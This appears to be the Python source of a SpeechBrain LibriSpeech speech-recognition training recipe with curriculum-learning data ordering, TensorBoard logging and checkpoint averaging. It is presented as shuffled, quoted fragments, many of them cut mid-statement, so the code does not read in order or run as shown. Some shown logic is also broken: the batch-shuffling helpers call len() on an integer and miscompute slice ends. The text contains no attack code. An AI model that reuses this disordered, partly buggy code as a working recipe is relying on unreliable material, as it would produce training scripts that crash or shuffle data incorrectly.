Default ``2``. debug_epochs (int) Number of epochs to run in debug", "dataset (960 h). The best model is the average of the checkpoints from", "def make_dataloader( dataset, stage, ckpt_prefix=\"dataloader-\", **loader_kwargs, ): # TRAIN stage is handled specially.", "if (isinstance(min_value,float) and value < min_value) or \\ (isinstance(max_value,float) and value > max_value):", "needs to be reshuffled at the end of epoch \"\"\" if self.inter_epoch_dataset_updation: if", "the top of decoder probabilities. The neural network is trained on both CTC", "train_data.curriculum_based_filtered_sorted( ordering_info=ordering_info, batch_selection=batch_selection, batch_size=batch_size ) # when sorting do not shuffle in dataloader", "should) be overridden. The following methods are used and expected to have a", "1 elif duration1 < duration2: return -1 else: return 0 def _output_length_comparator( self,", "checkpointer=checkpointer ) # save attributes related to curriculum learning self.inter_epoch_dataset_updation = inter_epoch_dataset_updation self.ordering", "it is used directly. train_loader_kwargs : dict Kwargs passed to `make_dataloader()` for making", "= sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=csv_file, replacements={\"data_root\": data_folder} ) test_datasets[name] = test_datasets[name].filtered_sorted( sort_key=\"duration\" ) datasets =", "stage_stats[\"ACC\"] = self.acc_metric.summarize() current_epoch = self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval if ( current_epoch %", "1 global_step = completed_steps + self.step loss, loss_ctc, loss_seq = self.fit_batch(batch) self.avg_train_loss =", "torch from torch.utils.tensorboard import SummaryWriter import sys import logging from pathlib import Path", "the ``Brain`` class and override any methods for which the default behavior does", "sorting do not shuffle in dataloader ! otherwise is pointless hparams[\"train_dataloader_opts\"][\"shuffle\"] = False", "to tensorboard self.tensorboard_writer.add_scalar(\"Train/Loss/tot_loss\", loss, global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/ctc_loss\", loss_ctc, global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/att_loss\", loss_seq, global_step) # Debug", "or \\ (isinstance(max_value,float) and value > max_value): weights.pop(key,None) return weights filtered_weights = weights_filter(weights,min_value,max_value)", "break # Write validation summary to tensorboard self.tensorboard_writer.add_scalar(\"Validation/Loss/tot_loss\", avg_valid_loss, epoch) self.tensorboard_writer.add_scalar(\"Validation/Accuracy/tot_acc\", self.acc_metric.summarize(), epoch)", "data example fulfills the filtering criteria\"\"\" for key, limit in key_min_value.items(): if computed[key]", "will only iterate a few batches for all datasets, to ensure code runs", "loss_ctc = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens) loss = ( self.hparams.ctc_weight * loss_ctc +", "avg_valid_loss = 0.0 with torch.no_grad(): for batch in tqdm( valid_set, dynamic_ncols=True, disable=not enable", "curriculum based dataset be used. It can take one of three values *", "is interrupted right before stage 2 group = current_optimizer.param_groups[0] if \"momentum\" not in", "progressbar. \"\"\" if not ( isinstance(train_set, DataLoader) or isinstance(train_set, LoopedLoader) ): train_set =", "do the following: > python train.py hparams/transformer.yaml > python train.py hparams/conformer.yaml With the", "sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline) # 4. Set output: sb.dataio.dataset.set_output_keys( datasets, [\"id\", \"sig\", \"wrd\", \"tokens_bos\", \"tokens_eos\",", "int If not None, will only keep data_point if weight[data_point] < max_weight weights", "( set(key_min_value.keys()) | set(key_max_value.keys()) | set(key_test.keys()) ) filtered_data_ids = [] with self.output_keys_as(temp_keys): for", "self.batch_selection = self.hparams.batch_selection self.sortagrad = sortagrad # create tensorboard summary writer self.tensorboard_writer =", "averaged checkpoint at the end of the evaluation stage # delete the rest", "consist of a string key and a hyperparameter that is used within the", "== '': continue column,order = order.split(\":\") ordering_info.append({\"key\":column,\"order\":order}) return ordering_info def _random_shuffle_data_ids( self, data_ids", "math.ceil(data_count / batch_size) shuffled_data_ids = [] for batch in np.random.permutation(np.arange(batch_count)): start_index = batch_size", "== \"random\": # pass # else: # raise NotImplementedError( # \"sorting must be", "items) to limit, will only keep data_point if data_point[key] >= limit key_max_value :", "# comparing using the next key, else return the result if res ==", "to tensorboard self.tensorboard_writer.add_scalar(\"Validation/Loss/tot_loss\", avg_valid_loss, epoch) self.tensorboard_writer.add_scalar(\"Validation/Accuracy/tot_acc\", self.acc_metric.summarize(), epoch) # Only run validation \"on_stage_end\"", "create the datasets objects as well as tokenization and encoding train_data, valid_data, test_datasets,", "stage == sb.Stage.TRAIN: if hasattr(self.hparams, \"augmentation\"): feats = self.hparams.augmentation(feats) # forward modules src", "stage == sb.Stage.TRAIN: tokens_eos = torch.cat([tokens_eos, tokens_eos], dim=0) tokens_eos_lens = torch.cat( [tokens_eos_lens, tokens_eos_lens],", "self.hparams.stage_one_epochs: self.optimizer = self.hparams.SGD(self.modules.parameters()) if self.checkpointer is not None: self.checkpointer.add_recoverable(\"optimizer\", self.optimizer) self.switched =", "the ``configure_optimizers()`` method. hparams : dict Each key:value pair should consist of a", "== len(data_ids) , \"OOPS!! Batchwise sorting gone wrong.\" weights = {} for index,data_id", "stage=sb.Stage.VALID, ckpt_prefix=None, **valid_loader_kwargs, ) self.on_fit_start() self.train_set = train_set total_steps = len(train_set) if progressbar", "dataio_prepare(hparams): \"\"\"This function prepares the datasets to be used in the brain class.", "= {} for index,id in enumerate(shuffled_ids): weights[id] = index return weights def _random_shuffled_batches(", "dictionary out of it\"\"\" ordering_info = [] orderings = dataset_order.split(\",\") for order in", "of data loops. The primary purpose of the `Brain` class is the implementation", "tokens_lens = batch.tokens if hasattr(self.modules, \"env_corrupt\") and stage == sb.Stage.TRAIN: tokens_eos = torch.cat([tokens_eos,", "= batch.tokens if hasattr(self.modules, \"env_corrupt\") and stage == sb.Stage.TRAIN: tokens_eos = torch.cat([tokens_eos, tokens_eos],", "\"\"\" for ordering in dataset_orderings: key = ordering[\"key\"] order = 1 if ordering[\"order\"]", "items) to limit, will only keep data_point if data_point[key] <= limit key_test :", "0 or stage == sb.Stage.TEST ): stage_stats[\"WER\"] = self.wer_metric.summarize(\"error_rate\") # log stats and", "tqdm import numpy as np from functools import cmp_to_key from torch.utils.data import DataLoader", "= 0.0 with torch.no_grad(): for batch in tqdm( valid_set, dynamic_ncols=True, disable=not enable ):", "2. Define audio pipeline: @sb.utils.data_pipeline.takes(\"wav\") @sb.utils.data_pipeline.provides(\"sig\") def audio_pipeline(wav): sig = sb.dataio.dataio.read_audio(wav) return sig", "batches if self.debug and self.step == self.debug_batches: break if ( self.checkpointer is not", "== \"sorted\": if weights == None: # Create dataset using ordering info weights", "length2: return 1 elif length1 < length2: return -1 else: return 0 def", "dataset into batches. This helps in ordering the dataset at batch level. select_n", "# recreate dataset using random shuffling return else: return def check_and_reset_optimizer(self): \"\"\"reset the", "will be accessible via an ``hparams`` attribute, using \"dot\" notation: e.g., self.hparams.model(x). run_opts", "stats and save checkpoint at end-of-epoch if stage == sb.Stage.VALID and sb.utils.distributed.if_main_process(): #", "Type must be one of random, sorted, weighted_sorted.\" ) # order batchwise if", "return self.checkpointer.recover_if_possible( device=torch.device(self.device) ) def fit( self, epoch_counter, train_set, valid_set=None, progressbar=None, train_loader_kwargs={}, valid_loader_kwargs={},", "order these batches randomly to create final dataset batch_size : 8, int Used", "self.sortagrad < epoch: # recreate dataset using random shuffling return else: # recreate", "points using `ordering_info`\"\"\" def compare(key1,key2): \"\"\" Comparing logic, as `ordering_info` can contain multiple", "prediction self.acc_metric.append(p_seq, tokens_eos, tokens_eos_lens) return loss , loss_ctc, loss_seq def fit_batch(self, batch): \"\"\"Train", "use for training. If a Dataset is given, a DataLoader is automatically created.", "a few batches if self.debug and self.step == self.debug_batches: break # Write validation", "epoch == self.debug_epochs: break def on_evaluate_start(self, max_key=None, min_key=None): \"\"\"perform checkpoint averge if needed\"\"\"", "recoverable_name=\"model\", device=self.device ) self.hparams.model.load_state_dict(ckpt, strict=True) self.hparams.model.eval() def dataio_prepare(hparams): \"\"\"This function prepares the datasets", "1) * total_steps with tqdm( self.train_set, initial=self.step, dynamic_ncols=True, disable=not enable, ) as t:", "if ( self.checkpointer is not None and self.ckpt_interval_minutes > 0 and time.time() -", "a Transformer language model is used on the top of decoder probabilities. The", "steps = -1 optimizer = self.optimizer.__class__.__name__ epoch_stats = { \"epoch\": epoch, \"lr\": lr,", "used in the brain class. It also defines the data processing pipeline through", "data_id[weights[data_id]] = data_id data_count = len(data_ids) batch_count = math.ceil(data_count / batch_size) shuffled_data_ids =", "= torch.cat([tokens_bos, tokens_bos], dim=0) # compute features feats = self.hparams.compute_features(wavs) current_epoch = self.hparams.epoch_counter.current", "\"tokens\",\"duration\"], ) return train_data, valid_data, test_datasets, tokenizer if __name__ == \"__main__\": # CLI:", "If a Dataset is given, a DataLoader is automatically created. If a DataLoader", "weights_filter(weights,min_value,max_value): \"\"\"Checks if the data example has weight within the range (`min_value`, `max_value`)\"\"\"", "in CL which takes feedback from model and reshuffles the dataset. By, default,", ") # order batchwise if batch_selection == \"contiguous\": pass elif batch_selection == \"random\":", "reverse=True # ) # # when sorting do not shuffle in dataloader !", "capacity # and no LM to give user some idea of how the", "* <NAME> 2020 * <NAME> 2021 \"\"\" import os import torch from torch.utils.tensorboard", "for key,value in weights.items(): if (isinstance(min_value,float) and value < min_value) or \\ (isinstance(max_value,float)", "torch.no_grad(): asr_brain.evaluate( test_datasets[k], max_key=\"ACC\", test_loader_kwargs=hparams[\"test_dataloader_opts\"], ) # # print(train_data) # train_set = make_dataloader(", "= self.modules.seq_lin(pred) p_seq = self.hparams.log_softmax(pred) # Compute outputs hyps = None if stage", "SGD self.check_and_reset_optimizer() predictions = self.compute_forward(batch, sb.Stage.TRAIN) loss, loss_ctc, loss_seq = self.compute_objectives(predictions, batch, sb.Stage.TRAIN)", "# delete the rest of the intermediate checkpoints # ACC is set to", "# # print(train_data) # train_set = make_dataloader( # valid_data , # stage =", "isinstance(max_value,int): max_value = float(max_value) for key,value in weights.items(): if (isinstance(min_value,float) and value <", "tokens_bos, _ = batch.tokens_bos # Add augmentation if specified if stage == sb.Stage.TRAIN:", "multi-gpu (ddp) save data preparation run_on_main( prepare_librispeech, kwargs={ \"data_folder\": hparams[\"data_folder\"], \"tr_splits\": hparams[\"train_splits\"], \"dev_splits\":", "Only show progressbar if requested and main_process enable = progressbar and sb.utils.distributed.if_main_process() completed_steps", "optimizer on the training start\"\"\" super().on_fit_start() # if the model is resumed from", "epochs or not. It is used in CL which takes feedback from model", "steps, \"optimizer\": optimizer, } self.hparams.train_logger.log_stats( stats_meta=epoch_stats, train_stats=self.train_stats, valid_stats=stage_stats, ) self.checkpointer.save_and_keep_only( meta={\"ACC\": stage_stats[\"ACC\"], \"epoch\":", "test_datasets, tokenizer if __name__ == \"__main__\": # CLI: hparams_file, run_opts, overrides = sb.parse_arguments(sys.argv[1:])", "random, sorted # keys for ordering info can be , input_length, output_length, alphabetic", "for ordering in dataset_orderings: key = ordering[\"key\"] order = 1 if ordering[\"order\"] ==", "will be used to load checkpoints, and will have the optimizer added to", "duration1 > duration2: return 1 elif duration1 < duration2: return -1 else: return", "import prepare_librispeech # noqa # Create experiment directory sb.create_experiment_directory( experiment_directory=hparams[\"output_folder\"], hyperparams_to_save=hparams_file, overrides=overrides, )", "modules in ``modules`` at the beginning of the ``fit()`` method. This behavior can", "logging from pathlib import Path import speechbrain as sb from hyperpyyaml import load_hyperpyyaml", "weights def _random_shuffled_batches( self, weights=None, batch_size=8, reverse=False ): \"\"\"Randomly shuffle the dataset at", "Define text pipeline: @sb.utils.data_pipeline.takes(\"wrd\") @sb.utils.data_pipeline.provides( \"wrd\", \"tokens_list\", \"tokens_bos\", \"tokens_eos\", \"tokens\" ) def text_pipeline(wrd):", "# ) train_data = CurriculumOrientedDynamicDataset.from_csv( csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder}, ) ordering_info = hparams[\"ordering\"] batch_selection", "group = current_optimizer.param_groups[0] if \"momentum\" not in group: return self.checkpointer.recover_if_possible( device=torch.device(self.device) ) def", "opt_class=hparams[\"Adam\"], hparams=hparams, run_opts=run_opts, checkpointer=hparams[\"checkpointer\"], ) # adding objects to trainer: asr_brain.tokenizer = hparams[\"tokenizer\"]", "text1 = self.data[key1][\"wrd\"] text2 = self.data[key2][\"wrd\"] if text1 > text2: return 1 elif", "strict=True) self.hparams.model.eval() def dataio_prepare(hparams): \"\"\"This function prepares the datasets to be used in", "for which the default behavior does not match the use case. For a", "sortagrad=-1 ): super().__init__( modules=modules, opt_class=opt_class, hparams=hparams, run_opts=run_opts, checkpointer=checkpointer ) # save attributes related", "loss, self.avg_train_loss ) t.set_postfix(train_loss=self.avg_train_loss) # Write training summary to tensorboard self.tensorboard_writer.add_scalar(\"Train/Loss/tot_loss\", loss, global_step)", "``5``. nonfinite_patience (int) Number of times to ignore non-finite losses before stopping. Default:", "with librispeech. The system employs an encoder, a decoder, and an attention mechanism", "so checkpointer only keeps the averaged checkpoint self.checkpointer.save_and_keep_only( meta={\"ACC\": 1.1, \"epoch\": epoch}, max_keys=[\"ACC\"],", "weights def _input_length_comparator( self, key1, key2 ): \"\"\"Compare two data points based on", "a single batch in input\"\"\" # check if we need to switch optimizer", "= ASR( modules=hparams[\"modules\"], opt_class=hparams[\"Adam\"], hparams=hparams, run_opts=run_opts, checkpointer=hparams[\"checkpointer\"], ) # adding objects to trainer:", "name = Path(csv_file).stem test_datasets[name] = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=csv_file, replacements={\"data_root\": data_folder} ) test_datasets[name] = test_datasets[name].filtered_sorted(", "``hparams`` attribute, using \"dot\" notation: e.g., self.hparams.model(x). run_opts : dict A set of", ">= self.ckpt_interval_minutes * 60.0 ): run_on_main(self._save_intra_epoch_ckpt) last_ckpt_time = time.time() # Run train \"on_stage_end\"", "Debug mode only runs a few batches if self.debug and self.step == self.debug_batches:", "is pointless # hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # elif hparams[\"sorting\"] == \"random\": # pass", "using `key` returned data points as equal, continue # comparing using the next", "to create weights based on pre-defined keys( and/or methods) and their order. -", "using custom weights\"\"\" def weights_filter(weights,min_value,max_value): \"\"\"Checks if the data example has weight within", "default hyperparameters, the system employs a convolutional frontend and a transformer. The decoder", "if len(dataset_ordering) > 0 else \"random\" filtered_data_ids = self._filter_dataset(self.data_ids, key_min_value, key_max_value, key_test) #", ": torch.optim class A torch optimizer constructor that has takes only the list", "ckpt_prefix=None, **valid_loader_kwargs, ) self.on_fit_start() self.train_set = train_set total_steps = len(train_set) if progressbar is", "it to encode the labels when creating # mini-batches. tokenizer = hparams[\"tokenizer\"] #", "order in orderings: if order.strip() == '': continue column,order = order.split(\":\") ordering_info.append({\"key\":column,\"order\":order}) return", "the next key, else return the result if res == 0: continue else:", "tokens_eos_lens = batch.tokens_eos tokens, tokens_lens = batch.tokens if hasattr(self.modules, \"env_corrupt\") and stage ==", "generally handle multiprocess logic, like splitting the training data into subsets for each", ") valid_data = valid_data.filtered_sorted(sort_key=\"duration\") # test is separate test_datasets = {} for csv_file", "limit key_max_value : dict Map from key (in data or in dynamic items)", "float(min_value) if isinstance(max_value,int): max_value = float(max_value) for key,value in weights.items(): if (isinstance(min_value,float) and", "to order batches. - Possible Values are `contiguous`, `random`, `sorted`, `reverse-sorted` - Example:", "valid_search_interval = self.hparams.valid_search_interval if current_epoch % valid_search_interval == 0 or ( stage ==", "for validation. If a Dataset is given, a DataLoader is automatically created. If", "t: for batch in t: self.step += 1 global_step = completed_steps + self.step", "of data to use for training. If a Dataset is given, a DataLoader", "words predicted_words = [ tokenizer.decode_ids(utt_seq).split(\" \") for utt_seq in hyps ] target_words =", "self.train_sampler, \"set_epoch\" ): self.train_sampler.set_epoch(epoch) # Time since last intra-epoch checkpoint last_ckpt_time = time.time()", "\"tokens_eos\", \"tokens\" ) def text_pipeline(wrd): yield wrd tokens_list = tokenizer.encode_as_ids(wrd) yield tokens_list tokens_bos", "self.switched = False if isinstance(self.optimizer, torch.optim.SGD): self.switched = True if self.switched is True:", "if requested and main_process enable = progressbar and sb.utils.distributed.if_main_process() completed_steps = (epoch -", "NotImplementedError( \"Ordering Type must be one of random, sorted, weighted_sorted.\" ) # order", "\"save_folder\": hparams[\"data_folder\"], \"merge_lst\": hparams[\"train_splits\"], \"merge_name\": hparams[\"train_csv\"], \"skip_prep\": hparams[\"skip_prep\"], }, ) # here we", "convolutional frontend and a transformer. The decoder is based on a Transformer decoder.", "DataLoader A set of data to use for training. If a Dataset is", "Use curriculum learning for all epochs * ``n`` - Use curriculum learning for", "features feats = self.hparams.compute_features(wavs) current_epoch = self.hparams.epoch_counter.current feats = self.modules.normalize(feats, wav_lens, epoch=current_epoch) if", "Create dataset using ordering info weights = self._custom_sorted_weights(filtered_data_ids, dataset_ordering) else: pass else: raise", "= torch.cat([tokens_lens, tokens_lens], dim=0) loss_seq = self.hparams.seq_cost( p_seq, tokens_eos, length=tokens_eos_lens ) loss_ctc =", "self.debug and epoch == self.debug_epochs: break def on_evaluate_start(self, max_key=None, min_key=None): \"\"\"perform checkpoint averge", "pointless # hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # elif hparams[\"sorting\"] == \"random\": # pass #", "self.inter_epoch_dataset_updation = inter_epoch_dataset_updation self.ordering = self.hparams.ordering self.batch_selection = self.hparams.batch_selection self.sortagrad = sortagrad #", "If a non-positive number is passed, all epochs are run. jit_module_keys (list of", "= self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval if ( current_epoch % valid_search_interval == 0 or", "``n`` - Use curriculum learning for ``n`` number of epochs By default, it", "(bool) If ``True``, this will only iterate a few batches for all datasets,", "self.checkpointer.find_checkpoints( max_key=max_key, min_key=min_key ) ckpt = sb.utils.checkpoints.average_checkpoints( ckpts, recoverable_name=\"model\", device=self.device ) self.hparams.model.load_state_dict(ckpt, strict=True)", "overridden. The following methods are used and expected to have a certain behavior:", "= {} for csv_file in hparams[\"test_csv\"]: name = Path(csv_file).stem test_datasets[name] = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=csv_file,", "== sb.Stage.VALID and sb.utils.distributed.if_main_process(): # report different epoch stages according current stage current_epoch", "== None and max_value == None: return weights if isinstance(min_value,int): min_value = float(min_value)", "if weight[data_point] < max_weight weights : None, dict Map from data_id to weight,", "if ordering[\"order\"] == \"asc\" else -1 if key == \"input_length\": res = self._input_length_comparator(key1,key2)", "of a epoch. This is used to handle , whether the dataset needs", "def on_fit_start(self): \"\"\"Initialize the right optimizer on the training start\"\"\" super().on_fit_start() # if", "time.time() # Only show progressbar if requested and main_process enable = progressbar and", "data_id computed = self.pipeline.compute_outputs(data_point) if combined_filter(computed, key_min_value, key_max_value, key_test): filtered_data_ids.append(data_id) return filtered_data_ids def", "optimizer # if so change the optimizer from Adam to SGD self.check_and_reset_optimizer() predictions", "shuffled_data_ids = [] for batch in np.flipud(np.arange(batch_count)): start_index = batch_size * batch end_index", "asr_brain = ASR( modules=hparams[\"modules\"], opt_class=hparams[\"Adam\"], hparams=hparams, run_opts=run_opts, checkpointer=hparams[\"checkpointer\"], ) # adding objects to", "to func, will only keep data_point if bool(func(data_point[key])) == True min_weight : None,", "num_workers. DataLoader kwargs are all valid. valid_loader_kwargs : dict Kwargs passed to `make_dataloader()`", "self.hparams.epoch_counter.current if current_epoch <= self.hparams.stage_one_epochs: lr = self.hparams.noam_annealing.current_lr steps = self.hparams.noam_annealing.n_steps optimizer =", "and targets.\"\"\" (p_ctc, p_seq, wav_lens, hyps,) = predictions ids = batch.id tokens_eos, tokens_eos_lens", "== sb.Stage.TEST: hyps, _ = self.hparams.test_search(enc_out.detach(), wav_lens) return p_ctc, p_seq, wav_lens, hyps def", "not match the use case. For a simple use case (e.g., training a", "estimated with Byte Pairwise Encoding (BPE) are used as basic recognition tokens. Training", "weightages for data_ids\"\"\" shuffled_ids = self._random_shuffle_data_ids(data_ids) weights = {} for index,id in enumerate(shuffled_ids):", "run in debug mode, Default ``2``. debug_epochs (int) Number of epochs to run", "By default, it is ``-1``. \"\"\" def __init__( self, modules=None, opt_class=None, hparams=None, run_opts=None,", "learning for ``n`` number of epochs By default, it is ``-1``. \"\"\" def", "start_index = batch_size * batch end_index = min((batch_size+1)*batch, len(data_count)) shuffled_data_ids += data_ids[start_index:end_index] assert", "loss_ctc.detach(), loss_seq.detach() def evaluate_batch(self, batch, stage): \"\"\"Computations needed for validation/test batches\"\"\" with torch.no_grad():", "wav_lens, pad_idx=self.hparams.pad_index ) # output layer for ctc log-probabilities logits = self.modules.ctc_lin(enc_out) p_ctc", "# compute the accuracy of the one-step-forward prediction self.acc_metric.append(p_seq, tokens_eos, tokens_eos_lens) return loss", "Kwargs passed to `make_dataloader()` for making the valid_loader (if valid_set is a Dataset,", "``2``. If a non-positive number is passed, all epochs are run. jit_module_keys (list", "ordering in dataset_orderings: key = ordering[\"key\"] order = 1 if ordering[\"order\"] == \"asc\"", "1 - key1 > key2 * -1 - key1 < key2 * 0", "dataset_order.split(\",\") for order in orderings: if order.strip() == '': continue column,order = order.split(\":\")", "points based on alphabetic order\"\"\" text1 = self.data[key1][\"wrd\"] text2 = self.data[key2][\"wrd\"] if text1", "text2: return -1 else: return 0 class ASR(sb.core.Brain): r\"\"\"Brain class abstracts away the", "for all datasets, to ensure code runs without crashing. debug_batches (int) Number of", "batch_size=batch_size ) # when sorting do not shuffle in dataloader ! otherwise is", "distributed_backend is ddp, this will generally handle multiprocess logic, like splitting the training", "from speechbrain.utils.distributed import run_on_main from speechbrain.dataio.dataset import DynamicItemDataset, FilteredSortedDynamicItemDataset from speechbrain.dataio.sampler import ReproducibleRandomSampler", "continue column,order = order.split(\":\") ordering_info.append({\"key\":column,\"order\":order}) return ordering_info def _random_shuffle_data_ids( self, data_ids ): \"\"\"Shuffle", "self.tensorboard_writer.add_scalar(\"Train/Loss/att_loss\", loss_seq, global_step) # Debug mode only runs a few batches if self.debug", "torch.utils.tensorboard import SummaryWriter import sys import logging from pathlib import Path import speechbrain", "data ids, fulfilling the filtering criteria.\"\"\" def combined_filter(computed, key_min_value, key_max_value, key_test): \"\"\"Checks if", "have the same dynamic items available) \"\"\" # ordering type can be random,", "numpy as np from functools import cmp_to_key from torch.utils.data import DataLoader from speechbrain.dataio.dataloader", "load_hyperpyyaml(fin, overrides) # If distributed_launch=True then # create ddp_group with the right communication", "* -1 - key1 < key2 * 0 - key1 = key2 \"\"\"", "defined if self.sortagrad < epoch: # recreate dataset using random shuffling return else:", "directly. valid_set : Dataset, DataLoader A set of data to use for validation.", "( stage == sb.Stage.TEST ): # Decode token terms to words predicted_words =", "comparing using the next key, else return the result if res == 0:", "purpose of the `Brain` class is the implementation of the ``fit()`` method, which", "min((batch_size+1)*batch, len(data_count)) shuffled_data_ids += data_ids[start_index:end_index] assert len(shuffled_data_ids) == len(data_ids) , \"OOPS!! Batchwise sorting", "the loss (CTC+NLL) given predictions and targets.\"\"\" (p_ctc, p_seq, wav_lens, hyps,) = predictions", "of epochs By default, it is ``-1``. \"\"\" def __init__( self, modules=None, opt_class=None,", "text2 = self.data[key2][\"wrd\"] if text1 > text2: return 1 elif text1 < text2:", "* 60.0 ): run_on_main(self._save_intra_epoch_ckpt) last_ckpt_time = time.time() # Run train \"on_stage_end\" on all", "to use for validation. If a Dataset is given, a DataLoader is automatically", "data into subsets for each device and only saving a checkpoint on the", "is performed on the full LibriSpeech dataset (960 h). The best model is", "\"\"\"Iterate epochs and datasets to improve objective. Relies on the existence of multiple", "weights == None: # Create dataset using ordering info weights = self._custom_sorted_weights(filtered_data_ids, dataset_ordering)", "= order.split(\":\") ordering_info.append({\"key\":column,\"order\":order}) return ordering_info def _random_shuffle_data_ids( self, data_ids ): \"\"\"Shuffle the data_ids", "batch end_index = min((batch_size+1)*batch, len(data_count)) shuffled_data_ids += data_ids[start_index:end_index] assert len(shuffled_data_ids) == len(data_ids) ,", "modules that need to be updated, the following methods can be overridden: *", ") tokens = torch.cat([tokens, tokens], dim=0) tokens_lens = torch.cat([tokens_lens, tokens_lens], dim=0) loss_seq =", "end of a epoch.\"\"\" # Compute/store important stats stage_stats = {\"loss\": stage_loss} if", "= batch.tokens_bos # Add augmentation if specified if stage == sb.Stage.TRAIN: if hasattr(self.modules,", "at the end of epoch \"\"\" if self.inter_epoch_dataset_updation: if self.sortagrad != -1: #", "most) the first n filtered data_points. The possible sorting is applied, but only", "epoch) self.avg_train_loss = 0.0 self.step = 0 # Validation stage if valid_set is", "full LibriSpeech dataset (960 h). The best model is the average of the", "create Dataloader using the weights filtered_sorted_ids = self._weighted_filtered_sorted_ids( weights, min_weight, max_weight, select_n )", ") def _filter_dataset( self, data_ids, key_min_value={}, key_max_value={}, key_test={} ): \"\"\"Returns a list of", "the system employs a convolutional frontend and a transformer. The decoder is based", "# save attributes related to curriculum learning self.inter_epoch_dataset_updation = inter_epoch_dataset_updation self.ordering = self.hparams.ordering", "epoch], ) # Debug mode only runs a few epochs if self.debug and", "self.hparams.noam_annealing.current_lr steps = self.hparams.noam_annealing.n_steps optimizer = self.optimizer.__class__.__name__ else: lr = self.hparams.lr_sgd steps =", "few batches if self.debug and self.step == self.debug_batches: break # Write validation summary", "def fit( self, epoch_counter, train_set, valid_set=None, progressbar=None, train_loader_kwargs={}, valid_loader_kwargs={}, ): \"\"\"Iterate epochs and", ": None, int If not None, only keep (at most) the first n", "shares static data. The reason to implement these operations in the same method", "self.acc_metric = self.hparams.acc_computer() self.wer_metric = self.hparams.error_rate_computer() def on_stage_end(self, stage, stage_loss, epoch): \"\"\"Gets called", "in ``modules`` at the beginning of the ``fit()`` method. This behavior can be", "a Transformer decoder. Beamsearch coupled with a Transformer language model is used on", "batch_selection == \"contiguous\": pass elif batch_selection == \"random\": weights = self._random_shuffled_batches(weights, batch_size) elif", "stage, epoch): \"\"\"Gets called at the beginning of each epoch\"\"\" if stage !=", "= self._input_length_comparator(key1,key2) elif key == \"output_length\": res = self._output_length_comparator(key1,key2) elif key == \"alphabetic\":", "model. To run this recipe, do the following: > python train.py hparams/transformer.yaml >", "loss.detach() , loss_ctc.detach(), loss_seq.detach() def evaluate_batch(self, batch, stage): \"\"\"Computations needed for validation/test batches\"\"\"", "test_datasets.items()] # We get the tokenizer as we need it to encode the", "int Number of epochs, for which curriculum based dataset be used. It can", "dim=0) loss_seq = self.hparams.seq_cost( p_seq, tokens_eos, length=tokens_eos_lens ) loss_ctc = self.hparams.ctc_cost(p_ctc, tokens, wav_lens,", "torch.no_grad(): for batch in tqdm( valid_set, dynamic_ncols=True, disable=not enable ): self.step += 1", "epoch) self.modules.train() # Reset nonfinite count to 0 each epoch self.nonfinite_count = 0", "a transformer. The decoder is based on a Transformer decoder. Beamsearch coupled with", "LoopedLoader) ): train_set = self.make_dataloader( train_set, stage=sb.Stage.TRAIN, **train_loader_kwargs ) if valid_set is not", "None if stage == sb.Stage.TRAIN: hyps = None elif stage == sb.Stage.VALID: hyps", "in dataloader ! otherwise is pointless hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # if hparams[\"sorting\"] ==", "based on input length\"\"\" duration1 = float(self.data[key1][\"duration\"]) duration2 = float(self.data[key2][\"duration\"]) if duration1 >", "1 if ordering[\"order\"] == \"asc\" else -1 if key == \"input_length\": res =", "opt_class : torch.optim class A torch optimizer constructor that has takes only the", "curriculum must be used is defined if self.sortagrad < epoch: # recreate dataset", "data_ids\"\"\" shuffled_ids = self._random_shuffle_data_ids(data_ids) weights = {} for index,id in enumerate(shuffled_ids): weights[id] =", "to a set of data. In order to use the ``fit()`` method, one", "# sort_key=\"duration\", reverse=True # ) # # when sorting do not shuffle in", "file is flexible enough to support a large variety of different systems. By", "dataset using random shuffling return else: # recreate dataset using preferred cl approach", "Value and its meaning * 1 - key1 > key2 * -1 -", "# else: # raise NotImplementedError( # \"sorting must be random, ascending or descending\"", "dim=0) tokens_lens = torch.cat([tokens_lens, tokens_lens], dim=0) loss_seq = self.hparams.seq_cost( p_seq, tokens_eos, length=tokens_eos_lens )", "dataset_ordering = self._parse_dataset_order(ordering_info) ordering_type = \"sorted\" if len(dataset_ordering) > 0 else \"random\" filtered_data_ids", "text pipeline: @sb.utils.data_pipeline.takes(\"wrd\") @sb.utils.data_pipeline.provides( \"wrd\", \"tokens_list\", \"tokens_bos\", \"tokens_eos\", \"tokens\" ) def text_pipeline(wrd): yield", "ordering_info=\"\", batch_selection=\"contiguous\", batch_size=8, select_n=None, ): \"\"\"Get a filtered and/or sorted version of this", "loss, avg_valid_loss ) # Debug mode only runs a few batches if self.debug", "self.debug_batches: break # Write validation summary to tensorboard self.tensorboard_writer.add_scalar(\"Validation/Loss/tot_loss\", avg_valid_loss, epoch) self.tensorboard_writer.add_scalar(\"Validation/Accuracy/tot_acc\", self.acc_metric.summarize(),", "will generally handle multiprocess logic, like splitting the training data into subsets for", "(if valid_set is a Dataset, not DataLoader). E.g., batch_size, num_workers. DataLoader kwargs are", "attribute, using \"dot\" notation: e.g., self.hparams.model(x). run_opts : dict A set of options", "is that computing some dynamic items may be expensive, and this way the", ") train_data = CurriculumOrientedDynamicDataset.from_csv( csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder}, ) ordering_info = hparams[\"ordering\"] batch_selection =", "of each epoch in a progressbar. \"\"\" if not ( isinstance(train_set, DataLoader) or", "can contain multiple keys Note: Value and its meaning * 1 - key1", "% valid_search_interval == 0 or stage == sb.Stage.TEST ): stage_stats[\"WER\"] = self.wer_metric.summarize(\"error_rate\") #", "= train_data.filtered_sorted( # sort_key=\"duration\", reverse=True # ) # # when sorting do not", "end of epoch \"\"\" if self.inter_epoch_dataset_updation: if self.sortagrad != -1: # number of", "anneal lr every update self.hparams.noam_annealing(self.optimizer) return loss.detach() , loss_ctc.detach(), loss_seq.detach() def evaluate_batch(self, batch,", "elif stage == sb.Stage.TEST: hyps, _ = 